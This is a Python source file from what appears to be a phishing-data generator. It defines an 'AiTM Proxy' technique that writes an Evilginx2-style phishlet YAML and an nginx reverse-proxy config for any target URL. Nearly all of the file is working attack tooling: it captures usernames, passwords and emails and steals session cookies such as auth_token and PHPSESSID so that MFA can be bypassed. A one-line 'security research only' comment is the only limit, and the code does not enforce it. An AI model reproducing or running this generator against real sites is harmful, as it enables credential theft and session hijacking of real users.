from __future__ import annotations

import json
from typing import Any, ClassVar

from app.techniques.base import (
    ApplyResult, BaseTechnique, Category, OptionSpec, Requirement, TechniqueGroup,
)
from app.utils.url_utils import parse_url, split_domain_labels


class AiTMProxyTechnique(BaseTechnique):
    """
    T20 — Adversary-in-the-Middle (AiTM) / Evilginx-like proxy config.

    Generates a YAML configuration file modelled on the Evilginx2 phishlet
    format. The config instructs the proxy to sit between the victim and the
    legitimate site, capturing credentials and session tokens in real time.
    """

    TECHNIQUE_ID: ClassVar[int] = 20
    TECHNIQUE_NAME: ClassVar[str] = "AiTM Proxy Config (Evilginx-like)"
    GROUP: ClassVar[TechniqueGroup] = TechniqueGroup.MFA_AUTH_BYPASS
    CATEGORIES: ClassVar[list[Category]] = [Category.CREDENTIAL_THEFT]
    REQUIREMENTS: ClassVar[list[Requirement]] = [Requirement.ALWAYS]
    DESCRIPTION: ClassVar[str] = (
        "Generates an Evilginx2-style phishlet YAML config for an "
        "Adversary-in-the-Middle reverse proxy. Captures credentials and "
        "session tokens in real-time, bypassing MFA entirely."
    )
    OPTION_SPECS: ClassVar[list[OptionSpec]] = [
        OptionSpec(
            name="proxy_port",
            description="Port the proxy listens on",
            type=int,
            default=8080,
            min_value=1024,
            max_value=65535,
        ),
        OptionSpec(
            name="capture_fields",
            description="Form field names to capture",
            type=list,
            default=["username", "password", "email"],
        ),
        OptionSpec(
            name="session_cookie_names",
            description="Cookie names to steal for session hijacking",
            type=list,
            default=["session", "auth_token", "PHPSESSID", "access_token"],
        ),
        OptionSpec(
            name="domain_aliases",
            description="Additional domains to proxy (multi-domain phishlets)",
            type=list,
            default=[],
        ),
        OptionSpec(
            name="enable_websocket",
            description="Include WebSocket Upgrade headers in the nginx snippet",
            type=bool,
            default=True,
        ),
    ]

    def apply(
        self,
        html: str,
        url: str,
        options: dict[str, Any],
        screenshot_bytes: bytes | None = None,
    ) -> ApplyResult:
        proxy_port: int = int(options.get("proxy_port", 8080))
        capture_fields: list[str] = options.get(
            "capture_fields", ["username", "password", "email"]
        )
        cookie_names: list[str] = options.get(
            "session_cookie_names",
            ["session", "auth_token", "PHPSESSID", "access_token"],
        )

        domain_aliases: list[str] = options.get("domain_aliases", []) or []
        enable_ws: bool = bool(options.get("enable_websocket", True))

        parsed, _ = parse_url(url)
        domain = parsed.netloc or "target.com"
        scheme = parsed.scheme or "https"
        port = parsed.port
        bare_domain = (parsed.hostname or domain.split(":")[0]).lower()

        base, subs = split_domain_labels(bare_domain)
        tld = base or bare_domain
        sub = subs[0] if subs else "www"

        credential_entries = "\n".join(
            f"  - key: {field}\n    search: '(.+)'"
            for field in capture_fields
        )
        token_entries = "\n".join(
            f'  - domain: ".{tld}"\n    keys: ["{name}"]'
            for name in cookie_names
        )

        phishlet_yaml = f"""# Evilginx2-style phishlet — generated by phish_data_generator
# DO NOT deploy this for malicious purposes. Security research only.

name: {tld.replace(".", "_")}
proxy_hosts:
  - phish_sub: www
    orig_sub: {sub}
    domain: {tld}
    session: true
    is_landing: true

sub_filters:
  - triggers_on: {bare_domain}
    orig_sub: {sub}
    domain: {tld}
    search: '{scheme}://{bare_domain}'
    replace: '{{hostname}}'
    mimes: ['text/html', 'application/json', 'application/javascript']

credentials:
{credential_entries}

auth_tokens:
{token_entries}

force_post:
  - path: '/login'
    search: ['username', 'password']

proxy:
  port: {proxy_port}
  target: {scheme}://{bare_domain}
"""

        server_names = " ".join([f"phish.{tld}"] + domain_aliases) if domain_aliases else f"phish.{tld}"
        port_suffix = f":{port}" if port else ""

        ws_block = """        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";
        proxy_read_timeout 86400;
""" if enable_ws else ""

        nginx_snippet = f"""# Nginx reverse-proxy snippet (partial)
server {{
    listen 443 ssl http2;
    server_name {server_names};

    location / {{
        proxy_pass {scheme}://{bare_domain}{port_suffix};
        proxy_set_header Host {bare_domain};
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
{ws_block}    }}
}}
"""

        self.log("info", "aitm_applied",
                 base=tld, subs=",".join(subs),
                 aliases=len(domain_aliases), ws=enable_ws)

        return ApplyResult(
            modified_html=None,
            modified_url=None,
            extra_files={
                "evilginx_phishlet.yaml": phishlet_yaml.encode(),
                "nginx_proxy_snippet.conf": nginx_snippet.encode(),
            },
            change_log=[
                self._make_change(
                    "aitm_config_generated",
                    f"Generated Evilginx2 phishlet YAML for {domain}; "
                    f"captures {capture_fields}; steals {cookie_names}",
                    details={
                        "base_domain": tld,
                        "subdomains": subs,
                        "alias_count": len(domain_aliases),
                        "aliases": domain_aliases,
                        "ws_enabled": enable_ws,
                        "port": port,
                    },
                )
            ],
        )

    def evaluate(self, html, url, change_log, extra_files):
        from app.techniques.base import EvaluationResult
        signals, issues = [], []

        yaml_bytes = extra_files.get("evilginx_phishlet.yaml", b"")
        yaml_text = yaml_bytes.decode("utf-8", errors="replace") if yaml_bytes else ""
        if yaml_text:
            signals.append(f"evilginx_phishlet.yaml present ({len(yaml_bytes)} bytes)")
        else:
            issues.append("evilginx_phishlet.yaml missing from extra_files")

        if "proxy_hosts:" in yaml_text:
            signals.append("YAML has proxy_hosts: section")
        else:
            issues.append("YAML missing proxy_hosts: section")

        if "credentials:" in yaml_text:
            signals.append("YAML has credentials: section")
        else:
            issues.append("YAML missing credentials: section")

        if "auth_tokens:" in yaml_text:
            signals.append("YAML has auth_tokens: section (session hijacking)")
        else:
            issues.append("YAML missing auth_tokens: section")

        nginx = extra_files.get("nginx_proxy_snippet.conf", b"")
        if len(nginx) > 50:
            signals.append(f"nginx_proxy_snippet.conf present ({len(nginx)} bytes)")

        entry = next((e for e in change_log if e.change_type == "aitm_config_generated"), None)
        if entry:
            base = entry.details.get("base_domain", "")
            signals.append(f"change_log: base_domain={base!r}")
        else:
            issues.append("No aitm_config_generated in change_log")

        passed = bool(yaml_text) and "proxy_hosts:" in yaml_text and "credentials:" in yaml_text
        return EvaluationResult(
            passed=passed,
            score=self._eval_score(signals, issues),
            signals=signals,
            issues=issues,
            details={"yaml_bytes": len(yaml_bytes), "has_proxy_hosts": "proxy_hosts:" in yaml_text},
        )
